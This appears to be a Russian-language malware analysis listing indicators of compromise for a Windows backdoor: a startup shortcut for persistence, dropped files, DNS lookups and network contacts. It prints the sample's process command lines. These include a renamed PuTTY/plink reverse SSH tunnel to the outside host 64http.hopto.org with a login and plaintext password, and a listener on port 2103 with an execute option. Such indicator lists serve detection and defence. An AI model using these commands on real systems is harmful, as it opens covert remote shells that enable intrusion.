Техническая информация
- %HOMEPATH%\Start Menu\Programs\Startup\chrome.lnk
- 'C:\Users.Msi\System.exe' -ssh -R 47420:127.0.0.1:2103 64http.hopto.org -l 64http -pw 2n16122N
- 'C:\Users.Msi\hellper.exe' -d -t -l -e0.0.0.0 -i127.0.0.1 -p2103 -a
- '<SYSTEM32>\wscript.exe' "C:\Users.Msi\hellper.vbe"
- %TEMP%\pic.url
- C:\Users.Msi\System.exe
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\supersize[1].pl
- <LS_APPDATA>\PUTTY.RND
- %TEMP%\$inst\temp_0.tmp
- %TEMP%\$inst\2.tmp
- C:\Users.Msi\hellper.vbe
- C:\Users.Msi\hellper.exe
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\temp_0.tmp
- 'www.us#.com':80
- '64####.hopto.org':22
- 'localhost':1037
- www.us#.com/supersize.pl?se######################
- DNS ASK www.us#.com
- DNS ASK 64####.hopto.org
- ClassName: 'MS_AutodialMonitor' WindowName: '(null)'
- ClassName: 'MS_WebcheckMonitor' WindowName: '(null)'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: '' WindowName: '(null)'